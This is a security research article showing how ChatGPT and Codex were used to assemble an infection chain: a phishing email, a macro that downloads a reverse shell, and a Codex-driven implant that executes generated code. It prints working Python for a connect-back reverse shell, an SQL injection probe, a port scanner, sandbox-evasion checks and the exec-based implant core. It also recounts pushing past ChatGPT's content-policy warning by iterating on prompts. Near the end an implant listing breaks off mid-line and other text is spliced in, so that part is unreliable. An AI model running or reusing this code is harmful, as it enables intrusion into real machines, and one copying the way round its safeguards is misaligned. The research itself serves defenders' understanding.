OpwnAI: AI That Can Save the Day or HACK it Away

Introduction

In the last few weeks, interest in general AI has exploded in the media and on social networks following the release of ChatGPT, OpenAI's new interface for its Large Language Model (LLM). The model powers many applications across the web and has been praised for its ability to generate well-written code and aid the development process. However, the new technology also brings risks: lowering the bar for code generation can help less-skilled threat actors effortlessly launch cyber-attacks.

In this article, Check Point Research demonstrates:

  • How artificial intelligence (AI) models can be used to create a full infection flow, from spear-phishing to running a reverse shell.
  • How researchers created an additional backdoor that dynamically runs scripts that the AI generates on the fly.
  • Examples of the positive impact of OpenAI on the defenders side and how it can help researchers in their day-to-day work.

The world of cybersecurity is rapidly changing. It is critical to emphasize the importance of remaining vigilant about how this new and developing technology can affect the threat landscape, for both good and bad. While this new technology helps defenders, it also lowers the entrance bar for low-skilled threat actors to run phishing campaigns and develop malware.

Background

From image generation to writing code, AI models have made tremendous progress in multiple fields: the famous AlphaGo software beat the top professionals at the game of Go in 2016, and improved speech recognition and machine translation brought the world virtual assistants such as Siri and Alexa that play a major role in our daily lives.

Recently, public interest in AI spiked due to the release of ChatGPT, a prototype chatbot whose "purpose is to assist with a wide range of tasks and answer questions to the best of my ability." Unless you've been disconnected from social media for the last few weeks, you've most likely seen countless images of ChatGPT interactions, from writing poetry to answering programming questions.

However, like any technology, ChatGPT's increased popularity also carries increased risk. For example, Twitter is replete with examples of malicious code or dialogues generated by ChatGPT. Although OpenAI has invested tremendous effort into stopping abuse of its AI, it can still be used to produce dangerous code.

To illustrate this point, we decided to use ChatGPT and another platform, OpenAI's Codex, an AI-based system that translates natural language to code, most capable in Python but proficient in other languages. We created a full infection flow and gave ourselves the following restriction: We did not write a single line of code and instead let the AIs do all the work. We only put together the pieces of the puzzle and executed the resulting attack.

We chose to illustrate our point with a single execution flow, a phishing email with a malicious Excel file weaponized with macros that downloads a reverse shell (one of the favorites among cybercrime actors).

ChatGPT: The Talented Phisher

In the first step, we created a plausible phishing email. This cannot be done by Codex, which can only generate code, so we asked ChatGPT for assistance, suggesting that it impersonate a hosting company.

Figure 1 – Basic phishing email generated by ChatGPT

Note that while OpenAI mentions that this content might violate its content policy, its output provides a great start. In further interaction with ChatGPT, we can clarify our requirements: to avoid hosting additional phishing infrastructure, we want the target simply to download an Excel document. Asking ChatGPT to iterate again produces an excellent phishing email:

Figure 2 – Phishing email generated by ChatGPT

Iteration is essential when working with the model, especially for code. The next step, creating the malicious VBA code in the Excel document, also requires multiple iterations.

This is the first prompt:

Figure 3 – Simple VBA code generated by ChatGPT

This code is very naive and uses libraries such as WinHttpReq. However, after some short iteration and back-and-forth chatting, ChatGPT produces better code:

Figure 4 – Another version of the VBA code

This is still a very basic macro, but we decided to stop here, as obfuscating and refining VBA code can be a never-ending process. ChatGPT proved that, given good textual prompts, it can produce working malicious code.

Codex – An AI, Or the Future Name of an Implant?

Armed with the knowledge that ChatGPT can produce malicious code, we were curious to see what Codex, whose original purpose is translating natural language to code, can do. In what follows, all code was written by Codex. We intentionally demonstrate the most basic implementations of each technique to illustrate the idea without sharing too much malicious code.

We first asked it to create a basic reverse shell for us, using a placeholder IP and port. The prompt is the comment in the beginning of the code block.

Figure 5 – Basic reverse shell generated by Codex
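The shell Codex produced boils down to a socket connect-back with the shell's standard streams redirected over the connection. The following is our minimal sketch of that technique, not Codex's exact output; the IP and port are placeholders (as in the prompt), and the POSIX branch is what actually runs the stdio redirection shown here:

```python
import os
import socket
import subprocess

def reverse_shell(host, port):
    """Connect back to a listener at host:port and attach a shell to the socket."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    # cmd.exe on Windows, /bin/sh elsewhere; the shell's stdio is the socket itself
    shell = ["cmd.exe"] if os.name == "nt" else ["/bin/sh"]
    subprocess.call(shell, stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
    s.close()

if __name__ == "__main__":
    reverse_shell("192.0.2.1", 4444)  # placeholder IP and port
```

On the listener side, anything typed into the connection is executed by the remote shell, and its output travels back over the same socket.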

This is a great start, but it would be nice to have some malicious tools to assist our intrusion. Perhaps some scanning tools, such as checking whether a service is vulnerable to SQL injection, and port scanning?

Figure 6 – The most basic implementation of SQLi generated by Codex
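The most basic form of such a check sends a lone quote character in a parameter and fingerprints database error messages in the response. The sketch below is illustrative of the technique, not Codex's output; the error-string list and function name are our own assumptions:

```python
import urllib.parse
import urllib.request

# Common database error fingerprints (illustrative sample, not exhaustive)
SQL_ERRORS = ["sql syntax", "sqlstate", "unclosed quotation mark"]

def naive_sqli_check(url, param):
    """Append a single-quote payload to `param` and look for DB error text."""
    probe = url + ("&" if "?" in url else "?") + urllib.parse.urlencode({param: "'"})
    try:
        body = urllib.request.urlopen(probe, timeout=5).read().decode(errors="ignore")
    except Exception:
        return False  # unreachable host or hard error: report not vulnerable
    return any(err in body.lower() for err in SQL_ERRORS)
```

A real scanner would also try boolean- and time-based payloads; error-string matching alone misses anything that suppresses database errors.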

Figure 7 – Basic port scanning script
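Port scanning at its most basic is just attempting TCP connections and recording which ones succeed. A minimal sketch along the lines of Figure 7 (the function name and timeout default are our own, not Codex's output):

```python
import socket

def scan_ports(host, ports, timeout=0.5):
    """Return the subset of `ports` on `host` that accept a TCP connection."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising an exception
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports
```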

This is also a good start, but we would also like to add some mitigations to make the defenders' lives a little more difficult. Can we detect if our program is running in a sandbox? The basic answer provided by Codex is below. Of course, it can be improved by adding other vendors and additional checks. 

Figure 8 – Basic sandbox detection script
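Basic sandbox checks of this kind typically look for artifacts that virtualization guest tools leave on disk. The sketch below shows the idea; the driver paths are a small assumed sample, and as noted above, a real check would cover many more vendors and signals (MAC prefixes, registry keys, running processes):

```python
import os

# Driver files commonly installed by virtualization guest tools
# (illustrative sample only - real checks cover many more vendors)
SANDBOX_ARTIFACTS = [
    r"C:\Windows\System32\drivers\VBoxGuest.sys",  # VirtualBox
    r"C:\Windows\System32\drivers\vmhgfs.sys",     # VMware
]

def likely_sandbox(artifacts=SANDBOX_ARTIFACTS):
    """Return True if any known guest-tool artifact is present on disk."""
    return any(os.path.exists(path) for path in artifacts)
```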

We see that we are making progress. However, all of this is standalone Python code. Even if an AI bundles this code together for us (which it can), we can't be sure that the infected machine will have an interpreter. To make it run natively on any Windows machine, the easiest solution is to compile it to an exe. Once again, our AI buddies come through for us:

Figure 9 – Conversion from python to exe
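The conversion in Figure 9 is a standard PyInstaller invocation; something along these lines, where the script name is a placeholder:

```shell
# Bundle the script together with a Python interpreter into a single
# executable; run this on Windows so the output is a native PE file.
pip install pyinstaller
pyinstaller --onefile --noconsole implant.py   # output lands in dist\implant.exe
```

`--onefile` packs everything into one binary and `--noconsole` suppresses the console window, both useful properties for a payload that should run quietly.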

And just like that, the infection flow is complete. We created a phishing email, with an attached Excel document that contains malicious VBA code that downloads a reverse shell to the target machine. The hard work was done by the AIs, and all that's left for us to do is to execute the attack.

No Knowledge in Scripting? Don't Worry, English is Good Enough

We were curious to see how far the rabbit hole goes. Creating the initial scripts and modules is nice, but a real cyberattack requires flexibility, as the attackers' needs during an intrusion can change rapidly depending on the infected environment. To see how we can leverage the AI's ability to create code on the fly to answer this dynamic need, we created the following short Python code. After being compiled to a PE, the exe first runs the previously mentioned reverse shell. Afterwards, it waits for commands with the -cmd flag and runs Python scripts generated on the fly by querying the Codex API with a simple prompt in English.

import os
import sys
import openai
import argparse
import socket
import winreg

openai.api_key =
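The core of the described behavior (turn an English prompt into Python via the Codex API, then execute the result) can be sketched as follows. This is our reconstruction, not the original code: the model name and prompt framing are assumptions based on the legacy pre-1.0 openai Completions API, and the completion backend is injectable so the logic can be exercised without an API key:

```python
def generate_script(prompt, complete=None):
    """Turn an English prompt into Python source via a completion backend."""
    if complete is None:
        # Assumption: the legacy (pre-1.0) openai Completions API with Codex
        import openai

        def complete(p):
            resp = openai.Completion.create(
                model="code-davinci-002", prompt=p, max_tokens=256, temperature=0
            )
            return resp["choices"][0]["text"]

    return complete("# Python 3 script\n# " + prompt + "\n")

def run_generated(prompt, complete=None):
    """Execute the generated script on the fly - the core of the dynamic implant."""
    exec(generate_script(prompt, complete), {"__name__": "__generated__"})
```

Running model output directly through exec() is exactly what makes such an implant flexible, and exactly why it is hard to signature: the code that executes on the victim machine never existed before the query.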
